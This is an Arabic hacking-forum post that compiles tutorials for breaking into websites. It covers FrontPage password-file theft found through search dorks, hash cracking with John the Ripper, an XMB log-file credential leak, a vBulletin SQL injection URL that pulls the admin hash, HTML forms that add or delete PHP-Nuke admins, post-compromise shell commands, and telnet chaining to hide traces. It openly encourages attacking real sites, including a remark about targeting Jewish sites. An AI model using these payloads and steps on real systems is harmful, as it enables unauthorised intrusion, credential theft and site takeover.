منتدى العقرب منظمة الهكر
عزيزي العميل اترك لنا الفعل وسنترك لك الكلام لكن تأكد ان الحماية 100/100
منتدى العقرب منظمة الهكر
عزيزي العميل اترك لنا الفعل وسنترك لك الكلام لكن تأكد ان الحماية 100/100
منتدى العقرب منظمة الهكر
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

منتدى العقرب منظمة الهكر

ربنا اصرف عنا عذاب جهنم
 
الرئيسية صفحات البوابةأحدث الصورالتسجيلدخول

 

  مكتبة شروح اختراق المواقع والاجهزة والايميلات

اذهب الى الأسفل 
كاتب الموضوعرسالة
ابراهيم
Admin
Admin
ابراهيم


عدد المساهمات : 430
تاريخ التسجيل : 25/08/2010

منتدى العقرب منظمة الهكر
ابراهيم ابراهيم:
اوسمه (اسم العضو هنا)



 مكتبة شروح اختراق المواقع والاجهزة والايميلات  Empty
مُساهمةموضوع: مكتبة شروح اختراق المواقع والاجهزة والايميلات     مكتبة شروح اختراق المواقع والاجهزة والايميلات  Icon_minitimeالإثنين أكتوبر 18, 2010 3:42 pm

السلام عليكم ورحمة الله وبركاته
هنا ساضع كل ما لدى من شروح تتعلق بى اختراق المواقع والاجهزة والايميلات وايضا تشغيل البرامج
وايضا كل ما تقع عليه يدى من شروح موجودة فى المنتديات جديدة وقديمة وارجو ان تصبروا معى العمل شاق قليلا ومتعب من ناحية الخط لدينا ولكنى سا اتمر فى التنزيل فقط الاسبوع القادم انا قادم لمصر للعلاج وسا اغيب عن المنتدى وشكرا
ملاحظة لم ادكر صاحب الشرح او مكان نقله واعلموا كلها منقولة اما من القراصنة العرب او مكان اخر
شرح ثغرة الفرونت بيج
----------------------
ما هو الفرونت بيج
يعد فرونت بيج من أهم البرامج استخداماً في إنشاء صفحات الويب و اسهلها و اكثرها انتشارا
لكن فية ثغره قويه تمكنك من امتلاك موقع الضحيه .
=====================================
شرح الثغره :
عند تنصيب برنامج فرونت بيج يقوم البرنامج باقامة فولدرات وهي :
vti_pvt_/(اخطرهم)
vti_txt_/
vti_cnf_/
vti_log_/
vti_bin_/
private_/
ملاحظة:::--
تنفذ الثغرة على المواقع التي صممت بالفرونت بيج ولا تصلح لغيرها
====================================
(( كيف تعلم ان موقع ما يدعم الفرونت بيج ))
وذلك بعدة طرق ولن أذكر إلا الأسهل:
1-)بالذهاب إلى موقع netcraft
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
ستجد مربع على اليسار اكتب فيه اسم الموقع
مثال:[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
واضغط انتر
وبعد البحث راح نشوف النتيجة التالية:
The site [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] is running Apache/1.3.20 (Unix) mod_gzip/1.3.19.1a mod_perl/1.26 mod_bwlimited/0.8 PHP/4.0.6 mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6 on Linux
هنا يهمنا ثلاث اشياء:-
1- الملقم وهو:
apache 1.3.20
2- ودعم فرونت بيج
FrontPage/5.0.2.2510
3- النظام وهو
Linux
2-)او عن طريق إضافة الجملة
vti_inf.html_/
بعد عنوان الموقع لنفرض أن الموقع:
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
نضيف الجملة ليصبح بهذه الطريقةhttp://www.arank.com/_vti_inf.html
وبعدها اضغط Enter
وراح يطلعلك في أول الصفحة هذه الكلمة
Frontpage Configuration Information
أي قد تم تثبيت مجلدات وبرامج الفرونت بيج (يعني ان الموقع يدعم الفرونت بيج)
3-)وأيضا تستطيع معرفة الموقع يدعم الفرونت بيج أم لا
بإضافة
vti_cnf_/
بعد عنوان الموقع كهذا المثال:
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
واضغط زر الفأرة الأيمن واختار
source المصدر
وابحث عن
vti_generator:Programe
حيث
Programe تعني لنوع برنامج الفرونت بيج والإصدارات الخاصة به
كيف يتم تطبيق الثغره ؟؟
الحين وبعد لما عرفنا ان الموقع يدعم frontpage كيف نقدر نوصل لملف الباسوورد؟
بسيطة إنت هات الموقع الي يبدعم frontpage واعلمك
يعني وعلى سبيل المثال ان الموقع التالي
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
يدعم fontpage
طيب نذهب إلى ملف vti_pvt_
يعني كذا
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
وأول ماندخله نلاحظ وجود ملفات عديدة وأهم الملفات التي تأتي باسم:
Adminstrator.pwd
Adminstrators.pwd
Service.pwd
Users.pwd
User.pwd
Author.pwd
ممكت ما تلاقيها بالضبط لكن شبيهة منها
===================================
ألحين لنفرض إننا فتحنا أحد هذه الملفات ماذا نلاحظ نلاحظ وجود
username : passwd
اسم المستخدم والباسوورد
يعني انا اخترقت موقع بالفرونت بيج ولما جيت ابي اشوف الملفات
طلعلي ملف service يحتوي على user / password
وهذا مضمون الملف
operator:hi9LHn9wAMuKM
حيث اسم المستخدم : operator
الباسوورد المشفرة هي:hi9LHn9wAMuKM
ألحين وعرفنا يااخواني كيف نطلع الباسوورد المشفر ماباقي إلا نفك تشفيره
وهذا يتم ببرامج كثير
=(Crack Jack)=
تحميل البرنامج
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
=(John The Ripper)=
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
3SIZE=4]راح نستخدم الأفضل والأكثر تداولا وهو
John The Ripper

=====================================
إنت ألحين مستريح عندك username والـpassword
وش بقالك ؟!!
يقالك تلعب بالموقع لعب ألحين دخوله بعدة طرق وأحسنها من/
(1-)
frontpage
بعدين
file وتذهب إلى
open web
وتحط الموقع فتطلعلك الصفحة الرئيسية فير اللي بدك اياه بعدين
save or publish
بعدين بيطلب منك كلمة السر والاسم طبعا الشغلة سهلة تحط الاسم وكلمة السر وتحط
sign
- - - - - - - - - - - - - - - - - - -
(2-)
من FTP
وعليك ببرامج الـFTP المنتشرة
كالـws-ftp
والـpro ftp
والمزيد ...
ويمكنك عمل الطريقة من DOS ولكن البرامج أسهل لك وأضمن لك
وألحين أكيد تبون تجربون على مواقع بس ما تعرفون مواقع تدعم الفرونت بيج؟؟؟
أقولكم روحوا google(4)
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
واكتبوا في إطار البحث
vti_pvt_/
وراح تطلعلك مواقع كثيرة تحتوي على هذه الثغرة
-----------------------------------
وعندك محرك بحث
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
تكتب في محرك البحث
link:service.pwd
أو
link:adminstrators
وغيرها من الملفات الاحتمال وجود password فيها
وهذه ثغرات للفرونت بيج (غير المذكورة في الاعلى)
/_private/form_results.txt
/_private/form_results.htm
/_private/register.htm
/_vti_pvt/service.cnf
/_vti_pvt/service.stp
/_vti_pvt/services.cnf
/_vti_pvt/svcacl.cnf
/_vti_pvt/writeto.cnf
/_vti_pvt/access.cnf
/_vti_bin/_vti_aut/author.exe
/_vti_bin/_vti_aut/author.dll
/_vti_pvt/service.pwd
/_vti_pvt/users.pwd
/_vti_pvt/authors.pwd
/_vti_pvt/administrators.pwd
/_vti_bin/shtml.dll
/_vti_bin/shtml.exe
/_vti_bin
/_vti_bin/_vti_adm
/_vti_bin/_vti_aut
/_vti_pvt/writeto.cnf
/_vti_pvt/svcacl.cnf
/_vti_pvt/services.cnf
/_vti_pvt/service.stp
/_vti_pvt/service.cnf
/_vti_pvt/access.cnf
/_private/registrations.txt
/_vti_bin/_vti_aut/dvwssr.dll
/_private/registrations.htm
/_private/register.txt
/_private/register.htm
/_private/orders.txt
/_private/orders.htm
/_private/form_results.htm
/_private/form_results.txt
/_vti_bin/_vti_adm/admin.dll
--------------------------------------------------------------------------------------------------------
شرح طريقة كسر الباس المشفر بى استعمال برنامج جوهن
كسر تشفيرة الباسورد باستخدام جوهن
بسم الله الرحمن الرحيم
اللهم لا علم الا ما علمتنا انك انت العليم العظيم
حبايب اذا يوم تعلمتنا ثغره وطبقنا الثغره على مواقع اليهود وحصلنا موقع فيه الثغره ونجحت معنا نمثل على ذلك ثغرة الفرنت بيج وقدرنا انا ناخذ اسم المستخدم والباسورد ولقينا الباسورد مشفر كيف نفك الشفره للباسورد وذا الي راح نتكلم عنه كيف ؟؟؟
طيب راح نتعلم كيف نفك الشفره ببرنامج JOHN-16
والبرنامج احيانا يفك الشفره في دقايق واحيانا في ساعات واحيانا في اسبوع واحيانا ماتنفك الابطرق ثانيه بس بنفس البرنامج
طيب خلونا نشوف كيف نفك الشفره
حمل البرنامج
طيب نجي نشرح البرنامج :
طيب اكتشفنا موقع فيه ثغرة الفرونت بيج ولما طبقنا الثغره تجينا صفحه مكتوب فيها
haxor:aeEokqF64WbUE
طيب هنا نستنتج ان اسم المستخدم هو :haxor
والباسورد:aeEokqF64WbUE
الباسورد مشفر هنا
طيب نجي نفتح ضغط البرنامج تجينا الصور
ناخذ ملف JOHN-16 ونحطه في c وبعد مانحطه في c نفتح الملف JOHN-16 ويجينا خياران ندخل الخيار RUN
بعدما فتحنا RUN نحفظ اسم المستخدم والباسورد في مفكره
ونسمي المفكره اي اسم ونمثل هنا الاسم password ونحفظه في الملف RUN
طيب نروح ابدا وبعدين تشغيل ونكتب command ونشغل الدوس
(ملاحظه تفعل الخطوات وانت بداخل الملف RUN)
اذا شغلت الدوس تلاحظ السطر C:\JOHN-16\RUN>
واذا شغلت الدوس من سطح المكتب مارح يجيك السطر ذا ويجب عليك ان توصل ذا باستخدام الامر cd..
بعدين نكتب الامر john -i:al password.txt
ونضغط على انتر وارح يبدا البرنامج بفك الشفره وعليك بالصبر هنا
طيب بعد طول انتظار فك البرنامج الشفره ونشوف كيف بالصوره
بعد ماعرفنا ان البرنامج فك الشفره نروح على ملف جديد طلع لنا اسمه john
ونفتحه باستخدام المفكره
نشوف الباسورد الجديد
طيب الحين خلاص صار بيدنا اختراق الموقع اما مع الفرونت بيح او مع FTP وبرامجها كثير ونستنتج التالي
اسم المستخدم :haxor
الباسورد: sscool
خلاص الموقع في يدك الصور قريبا
--------------------------------------------------------------------------------------------------------
شرح ثغرة xml
منتديات Xmb .
السلام عليكم ،
------------------
ثغرة جديدة في منتديات من نوع XMB
الشرح والتطبيق
1- عليك بالذهاب الى موقع جوجل [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
2- اكتب في منطقة البحث XMB 1.6 Magic Lantern Final
3- سوف ترى منتديات كثييييييييره اكثرها مصابه بهذه الثغره لكن رجاااء
لاتقرب المنتديات العربية وعليك بتحذيرها من الثغره الموجوده.
4- اضغط على اي منتدى وقم بكتابة الكلمة التالية بعد عنوان المنتدى
index_log.log يعني راح يكون زي كده
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
5- راح ينزل عندك ملف والملف عباره عن ملف زي الكوكيز كبير وفيه اسماء
المستخدمين والباسورد وأشياء ثانيه ماتهمنا.
6- الأن عليك بالبحث في المنتدى عن اسم المدير وذلك بالذهاب الى المواضيع
وتشوف الأسماء والي تلقى تحت اسمه ادمن ستريتور انسخ اسمه.
7- افتح الملف الي نزلته من الموقع وسوي بحث عن اسم المدير راح يجيك زي
كده مثلا::
xmbuser=admin
واباس راح تلقاه قدامه زي كده
xmbpw=1faeb6747a31c854800ddf3c62b1717a
8- طبعا الباس في هذه الحاله مشفر وفك التشفير صعب لهذا الغرض قامت شركة
CCI بتصميم برنامج يقوم بهذا الغرض وهذه وصلت البرنامج
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
افتح البرنامج وفي :
رقم (1) قم بوضع علامة صح.
رقم (2) قم بوضع اسم العضو سواء مدير او غيره
رقم (3) قم بوضع الباس المشفر حق العضو او المدير او غيره
رقم (4) قم بوضع علامة صح.
رقم (5) قم بوضع البروكسي الي تريده اوالبروكسي حق مزوده الخدمه حقك
رقم (6) قم بوضع المنفذ حق البروكسي
10- بقي شيء واحد بعد اتمام الأعدادات حقت البرنامج بقي ان تذهب الى
المتصفح انترنت اكسبلورر > اضغط بالزر اليمين> الأتصالاات> اعدادات>
قم بوضع البروكسي هذا 127.0.0.1> والمنفذ 8080
11- بعد ذلك اذهب للمنتدى المستهدف وتجول فيه وكأنك المديرتبع المنتدى واعمل اللى انت عاوزة.
البرنامج موجود من ضمن برامج السكان رابط شغال
-------------------------------------------------------------------------------------------------------
فضلو هذا شرح بالصور لثغرة التقويم : ..
اول شي حمل البرنامج من هنــــــــــــــــــــــــا
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
بعدها ادخل اي موقع بحث مثل القوقل واكتب
powered by: vbulletin version 2.2.2
والثغره هذي مثل ماقال الامبراطور مصاب فيه النسخ من
2.2.2 الى 2.3.2
يعني تقدر تغير من
2.2.2
2.2.3
2.2.4
وهكذا لحد ماتوصل
2.3.2
المهم بعد ماتحصل الموقع اللي تبي تشوفه
حط ورا الموقع الرابط هذا
كود:
/calendar.php?action=edit& eventid=14%20union%20select%20userid,username,emai
l,'0000-0- 0',password,username%20from%20user%20where%20useri
d=1
طيب بعد ماادخلناه بعض المواقع ماتقبل الدخول الى الكليندر
الا انك تسجل فيهــــــــــــــــا
وبعضها عادي بدون تسجيل المهم شوفو الصورة
طبعا بعد ماحطينا الرابط طلعلنا الباسورد المشفر مع اسم الادمن ..
بعد كذا تروح تسجل بالمنتدى اذا لم تكن سجلت بالاول ..
بعد كذا نفتح البرنامج اللي نزلناه اول الموضوع ..
ونختار الكوكيز حقت الموقع اللي اخذنا الباسورد واليوز حقه زي الصوره ..
ونحط بكلمة bbuserid رقم العضويه اللي هو 1
ونحط بكلمة bbpassword الباسورد المشفر اللي طلع معنا
زي اللي بالصورتين
وبعد كذا طف كل المتصفحات اللي فاتحهن يعني لاتخلي شي مفتوح
وارجع افتح المنتدى اللي اخترقته مبروك عليك المدير العام
اشرحها::::::::
ازيدكم من الشعر بيت
احيانا يكون البرنامج فيه عشرااااااااااااات المواقع كيف نسوي عشان الوقت لا يبط قلوبنا انا اقلكم
سوي تحديث طبعا من البرنامج عشان يضهر لك الكويكز للمواقع كلها اللي في جهازك
واختار بحث او بالظغط علي شكل الناضورر
راح يجيك مستكيل ضع فيه فقط اسم الموقع بسسسسسسسسس
راح يجيك المطلوب بدون المواق المخزنه فيه
وطبق الثغره برواقه ...........
اه نسيت ازيد على حبيبي شي الثغره تنطبق على الاصدار اللي فوق 2 وتحت 3يعني اي منتدى طبق الثغره فيه وبأذن الله تسلك مو شرط انا طبقتها على 2.2.4 وشغاله وطبقتها على 2.8.9 وشغاله 100% انتم طبقو على كلوووووووووووووو
تحياتي
صور الموضوع واستعمال البرنامج وهو موجود من ضمن مكتبة البرامج




--------------------------------------------------------------------------------------------------------
ثغرات النيوك
وعندى لكم ثغرة للنيوك على ما اظن انها مازالت موجودة بس اكمل الشروح انزلها
سلام عليكم يا اخوان
سنتكلم اليوم عن اخر ثغره في مجله النيوك , وثغرات مجله النيوك
لا تنتهي كل ما يصدر اصداره جديده من النيوك يسرع الهكر في
اكتشاف ثغره في ملفاتها (1)
المهم لن اطيل عليكم كثيراا
الثغره تشرح لأول مره في منتدى عربي
وجميع الحقوق محفوظه لكاتب الموضوع ومنتديات الكاسر الذهبي
فالنبدأ بالشرح
الثغره تتكون من عده ثغرات وهي
1: تقوم باضافه ادمن جديد للمجله
2:تقوم بحذف ادمن من المجله
3:تقوم بالاطلاع على حساب الادمن
1: فالنبدأ باضافه ادمن جديد
افتح المفكره وضع بداخلها هذا الكود وقم بتغير عنوان موقع
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
الى عنوان الموقع المهاجم
وقوموا بحفظها بصيغه html
كود PHP:
منظمه الكاسر الذهبي
action="http://www.signup.co.il/thesite/admin.php/"
>

اسم المدير :



ااكتب اي اسم:



الباسورد:



الايميل:



value="eCcgVU5JT04gU0VMRUNUIDEvKjox">


value="1">



href="http://www.kg11.com/vb">جميع الحقوق محفوظه لمنظمه الكاسر
الذهبي


ThE rOcK



 



lang="ar-sa">      &n
bsp;       &nbs p
;        & n
bsp;       &nbs p


الثغره الثانيه
عرض حساب الادمن
افتح المفكره وضع بداخلها هذا الكود وقم بتغير عنوان موقع
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
الى عنوان الموقع المهاجم
وقوموا بحفظها بصيغه html
كود PHP:
منتديات الكاسر الذهبي








جميع الحقوق محفوظه لمنظمه الكاسر الذهبي


ThE rOcK


الثغره الثالثه
تقوم بحذف الادمن من المجله
افتح المفكره وضع بداخلها هذا الكود وقم بتغير عنوان موقع
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
الى عنوان الموقع المهاجم
وقوموا بحفظها بصيغه html
كود PHP:
منتديات الكاسر الذهبي
action="http://www.signup.co.il/thesite/admin.php">
الأسم الادمن:
value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
value="1">
value="deladminconf">



href="http://www.kg11.com/vb">
جميع الحقوق محفوظه لمنظمه الكاسر الذهبي


ThE rOcK


يلي ما بعرف يبحث في جوجل عن مجله النيوك يدخل جوجل ويكتب
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
Powered by PHPNuke
الان اذا واجهت موقع عربي مصاب بالثغره حذره من الثغره مو اختراقه
وكيفيه اغلاق الثغره اتبع التالي
افتح ملف admin.php
وضع هذا الكود بداخله
كود PHP:
if ( !empty($HTTP_GET_VARS['op']) ) {
$op = $HTTP_GET_VARS['op'];
}
if ( !empty($HTTP_POST_VARS['op']) ) {
$op = $HTTP_POST_VARS['op'];
}
لكن مكتشف الثغره لم يوضح في اي سطر يجب وضعه
انتهى الشرح
اختراقات موفقه للجميع
__________________
شرح لكم طريقة اتخراج الثغرات من الميلورم و ستغلال ثغرات sql

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
الثالثة هي SQL تم شرحها فوق
انتهاء الشرح ارجو ان اكون افدت الجميع 1- 2- 1-PERL
------------------------------------------------------------------------------------------------------
--==/=/=/=/=/=/================================================== ===================/=/=/=/=/=/==--
الدورة التعليمية لاختراق المواقع و السيرفرات مقدمة من طرف HouSSamix & toXiC350
--==/=/=/=/=/=/================================================== ===================/=/=/=/=/=/==--
--==/=/=/=/=/=/=========================================/=/=/=/=/=/==--
اوامر اللينكس
--==/=/=/=/=/=/=========================================/=/=/=/=/=/==--
اوامر اللينكس هي اللغة التي تستطيع التواصل بها مع الجهاز اللي مركب عليه اللينكس
وكما نعرف ان اغلب سيرفرات المواقع يكون عليها اللينكس لدلك يجب ان نعرف هده الاوامر حتى نعرف نتعامل معها في عمليات الاختراق
انا حصلت شيل وراح نطبق عليه بعض الاوامر
اهم الاوامر اللي نستخدمها كتيرا في عمليات الاختراق
id لمعرفة الصلاحيات على السيرفر
pwd : عرض المسار الكامل للمجلد الحالي
ls -la : عرض جميع الملفات والمعلومات
cd .. : تغيير المجلد الحالي خطو واحدة للأعلى
mv [old filename] [new filename] : تحويل أو إعادة تسمية ملف
rm * : مسح جميع الملفات في المجلد الحالي
rm -rf [directoryname] : مسح مجلد كامل
chmod 777 [filename] : اعطاء تصريح لملف . نغير 777 باي رقم تصريح نريد اعطاءه للملف
سحب ملف على السيرفر wget [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
فك الضغط ل zip unzip filename.zip
هنا تجدون اغلب الاوامر و هي منقولة عن شرح لاحد الاخوان لم استطع دكر اسمو لاني كنت حافض الموضوع بمستند نصي و غير مكتوب فيه صاحب الموضوع
pwd : عرض المسار الكامل للمجلد الحالي
ls : عرض جميع الملفات في المجلد الحالي
ls -la : عرض جميع الملفات والمعلومات
ls –alR : عرض جميع الملفات والمعلومات في المجلدات الفرعية
ls -alR > filename.txt : مثل ls –alR, ولكنه يخرج النتيجة في ملف
ls *.html : عرض جميع الملفات التي تنتهي بالامتداد .html
cd [directory name] : تغيير المجلد الحالي لآخر يتم تحديده بكتابة اسمه
cd .. : تغيير المجلد الحالي خطو واحدة للأعلى
clear : تنظيف الشاشة
vdir : يمنح معلومات أكثر من الأمر ls
exit : لتسجيل الخروج من الشيل
نقل ، نسخ و مسح الملفات :
mv [old filename] [new filename] : تحويل أو إعادة تسمية ملف
cp [filename] [new filename] : لنسخ ملف
rm [filename] : لمسح ملف
rm * : مسح جميع الملفات في المجلد الحالي
rm *.html : مسح جميع الملفات التي تنتهي بامتداد .html
rm -rf [directoryname] : مسح مجلد كامل
إنشاء، تحريك ، نسخ ومسح المجلدات :
mkdir [directory name] : إنشاء مجلد جديد
ls -d */ : عرض جميع المجلدات داخل المجلد الحالي
cp -r [directory] [new directory] : نسخ جميع الملفات والجلدات داخل مجلد جديد
البحث عن الملفات والمجلدات :
find . -name [filename] -print : للبحث عن ملف
grep [text] [filename] : للبحث عن نص داخل ملف
تصاريح الملفات والمجلدات :
هنالك ثلاثة مستويات لتصاريح الملفات هي: القراءة Read ، الكتابة Write والتنفيذ execute ، أيضاً هنالك ثلاث مجموعات لإعطاءها هذه التصاريح : Owner أو المالك ، Group مجموعة المستخدم والجميع everyone .
يستخدم الأمر chmod متبوعاً بتلاثة أرقام للتصاريح ، والرقم الأول هو للمالك Owner ، والرقم الثاني للمجموعة Group أما الثالث فهو للجميع Everyone .. وهذه ترجمة لمستويات هذه الأرقام والتصاريح :
0 = --- No permission
1 = --X Execute only
2 = -W- Write only
3 = -WX Write and execute
4 = R-- Read only
5 = R-X Read and execute
6 = RW- Read and write
7 = RWX Read, write and execute
ويفضل دائماً إعطاء التصريح (0) لمجموعة Group وذلك لمنع بقية المستخدمين على السيرفر من تصفح الملفات باستخدام الـ Telnet أو حتى الـ FTP
هذه بعض التصاريح الأكثر شيوعاً :
chmod 604 [filename] : أقل تصريح لمفات الـ Html
chmod 705 [directory name] : أقل تصريح للمجلدات
chmod 755 [filename] : أقل تصريح للبرامج والاسكربتات
chmod 606 [filename] : أقل تصريح للمفات المستخدمة من قبل الاسكربتات
chmod 703 [directory name] : تصريح القراءة فقط للـ Public FTP
كيفية فك الضغط عن ملف باستخدام الـ Telnet :
أولاً للتحقق من أنك داخل المجلد الذي يحوي الملف المضغوط قم بكتابة الأمر ls
إذا لم يكن الملف موجوداً قم بكتابة :
cd /big/dom/xdomain/www/directory/
وقم باستبدال المسار بالمسار الذي يحوي الملف الخاص بك
والآن كيف تجرى عملية فك الضغط ؟
إذا كان الملف ينتهي بالامتداد .zip مثال لذلك File.zip قم بكتابة الأمر :
unzip file.zip
إذا كان امتداد الملف ينتهي بـ .tar مثال file.tar قم بكتابة :
tar -xvf file.tar
إذا كان امتداد الملف ينتهي بـ .gz مثل file.gz قم بكتابة :
gzip -d file.gz
إذا كان امتداد الملف ينتهي بـ .tar.gz مثال file.tar.gz قم بكتابة :
gzip -d file.tar.gz
ومن ثم :
tar -xvf file.tar
كيفية إجراء نسخ احتياطي من قاعدة بيانات :
mysqldump -u db_usr_name -pPASSWORD db_name > file name.SQL
كيفية استرجاع قاعدة بيانات تم حفظها من قبل :
mysql -u db_usr_name -pPASSWORD db_name < file name.SQL
كيفية ضغط قاعدة البيانات :
tar -czvf file name.tar.gz file name.SQL
كيفية فك الضغط عن قاعدة البيانات :
tar -zxvf file name.tar.gz
كيفية عمل نسخ احتياطي من جميع قواعد البيانات لمستخدم معين :
mysqldump -uroot --all-databases | gzip > mysql_username.sql
بعض الأوامر الأخرى :
tail : مثل cat ولكنه يقرأ نهاية الملف فقط
tail /var/log/messages لرؤية آخر 20 سطر من /var/log/messages
tail -f /var/log/messages : للمشاهدة المتواصلة للملف أثناء إجراء التغييرات عليه
tail -200 /var/log/messages : لطباعة آخر 200 سطر من الملف على الشاشة
more : مثل cat
more /etc/userdomains : للتصفح من خلال ملف الـ userdomains file.
pico : لاستخدام محرر النصوص
pico /home/burst/public_html/index.html : لتحرير صفحة الـ Index الخاصة بالمستخدم.
vi : محرر آخر للنصوص به الكثير من المميزات ولكنه أصعب من pico عند استخدامه للمرة الأولى
vi /home/burst/public_html/index.html : أيضاً لتحرير صفحة الـ Index الخاصة بالمستخدم.
touch : لإنشاء ملف فارغ
touch /home/burst/public_html/404.html : لإنشاء ملف فارغ يسمى 404.html داخل المجلد /home/burst/public_html/
ln : يقوم بإنشاء روابط بين الملفات والمجلدات
ln -s /usr/local/apache/conf/httpd.conf /etc/httpd.conf : الآن يمكنك تحرير /etc/httpd.conf بدلاً من تحرير الملف الأصلي . وسوف تظهر التغييرات في الملف الأصلي أيضاً , كما أنه يمكنك مسح الرابط دون التغيير على الملف الأصلي.
rm : لحذف ملف
rm filename.txt : لحذف ملف بالسؤال التأكيد Confirmation للحذف
rm -f filename.txt : حذف الملف دون السؤال عن تأكيد الحذف.
rm -rf tmp/ : تحويل المجلد للـ tmp ويشمل هذا كل الملفات والمجلدات الفرعية بداخله.
last : لعرض من قام بتسجيل الدخول والزمن
last -20 : عرض آخر 20 عملية تسجيل دخول
last -20 -a : عرض آخر 20 عملية تسجيل دخول مع الـ Hostmane في آخر حقل
w : عرض المستخدمين الحاليين على السيرفر والذين قاموا بتسجيل الدخول وأين هم الآن في هذه اللحظة.
netstat : عرض جميع الجهات المتصلة حالياً .
netstat -an : عرض جميع الجهات المتصلة بالسيرفر بالإضافة للـ IP الخاص بكل اتصال والـ Port أو منفذ الاتصال.
top : لعرض live system processes في شكل جدول أنيق وكذلك معلومات الذاكرة والـ Uptime ومعلومات أخرى مفيدة , وهي ممتازة جداًً في عملية إدارة النظام وللتأكد من أن كل شيء يعمل جيداً.
للفرز حسب استخدام الذاكرة قم بكتابة top ومن ثم Shift + M
للفرز حسب استخدام الـ CPU قم بكتابة top ومن ثم Shift + P
ps: وهي اختصار لـ process status وهي مشابهة لأمر top . وهي لعرض الـ processes التي تعمل حالياً مع الـ PID أو الـ Process ID وهو رقم لتعريف الـ Process أو البرنامج ويمكنك إيقاف البرنامج من خلال هذا الرقم (فضلاً قم بمراجعة أوامر Kill
ps U username : عرض البرامج لمستخدم محدد
ps aux : عرض جميع الـ Processes أو البرامج التي تعمل
ps aux --forest : عرض جميع البرامج التي تعمل مثل السابق ولكن بتدرج جيد جداً ومفيد
du : لعرض استهلاك أو استخدام القرص Disk usage.
du -sh : لعرض ملخص عن المساحة المستخدمة بواسطة المجلد الحالي متضمناً المجلدات الفرعية.
du -sh * : نفس الشيء ولكن هذا يستخدم لكل ملف أو مجلد على حده ، وهو مفيد لإيجاد الملفات التي تحجز مساحة كبيرة
wc : عدد الكلمات
wc -l filename.txt : لمعرفة عدد سطور الملف المحدد
cp : لنسخ ملف
cp filename filename.backup : نسخ ملف لـ filename.backup
cp -a /home/burst/new_design/* /home/burst/public_html/ : لنسخ جميع الملفات مع الاحتفاظ بالتصاريح من مجلد لآخر
كيفية معرفة حجم ملف أو مجلد :
du -h /home/username/public_html/test
-----------------------------------------------------------------------------------------------------
طرق استهداف المواقع شرح فيديو
رابط الفيديو تفضلوا
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

-----------------------------------------------------------------------------------------------------
الاختراق بى التلنت وهدا الموضوع من موقع اجنبى ما نزل فى اى موقع عربى قبل
الترجمة موقع قوقل
التلنت هو أداة القرصنة بعد أن قدم من قبل مايكروسوفت. التلنت تسمح في الواقع كنت بعيد في الآلات ، أو الاتصال على أجهزة كمبيوتر مختلفة عن بعد -- دون بدنيا على الكمبيوتر. قراصنة تفعل كل شيء بعيد ، ولأسباب واضحة. كقاعدة ذهبية وقراصنة الكمبيوتر أبدا الإختراق مباشرة من منازلهم / الطابق السفلي الوالدين. هذا يجعل من السهل حقا عن الاجهزة الاتحادية لتعقب أنت إلى أسفل.

بدلا من ذلك ، قراصنة المهرة النائية في سلسلة من العديد من أجهزة الكمبيوتر في جميع أنحاء العالم ، مما يجعل الخاص المسارات الكثير من الجهد للعثور. وهذا ما يسمى footprinting. سوف التلنت تسمح لك لتسجيل الدخول إلى أي جهاز كمبيوتر (شريطة أن يكون لتشغيل التلنت). أوصي تشغيل التلنت وبعد فتحه على جهاز الكمبيوتر الخاص بك (ق).

لماذا التلنت؟
وهناك عدة أسباب لتشغيل التلنت. على افتراض ان كنت تشغل ويندوز إكس بي ، وهنا بعض من الفوائد

صغير
سريع
بنيت في حق ويندوز -- يمكن الوصول إليها بسهولة
تستخدم على نطاق واسع
آمن
يتيح لك تسجيل الدخول إلى أجهزة الكمبيوتر عن بعد
التلنت هي التكنولوجيا الوحيدة التي تمنحك القوة للسيطرة على الأجهزة عن بعد. وبغية تغطية المسارات الخاصة بك ، فمن المستحسن جدا أن تتعلم كيفية استخدامها.

كيف الإختراق مع التلنت سلسلة
سلسلة القرصنة هي الطريقة التي يستخدم القراصنة التلنت للاتصال من خلال سلسلة من أجهزة الكمبيوتر والإختراق كمبيوتر / فرد / الملقم من موقع مختلف. قد تبدو معقدة لمبتدئ متوسط ، ولكن هذا بسيط جدا. فقط اتبع هذه الخطوات :

اختيار مكان عام مع اتصال بالإنترنت ، مثل مكتبة أو مقهى. جلب المعدات الخاصة بك إذا أمكن ذلك.
تشغيل التلنت (ابدأ> تشغيل> التلنت)
تسجيل الدخول إلى ملقم بعيد
استخدام ذلك الملقم إلى البعيد إلى ملقم آخر
كرر الخطوات 2-4 بضع مرات
هاك هدفك
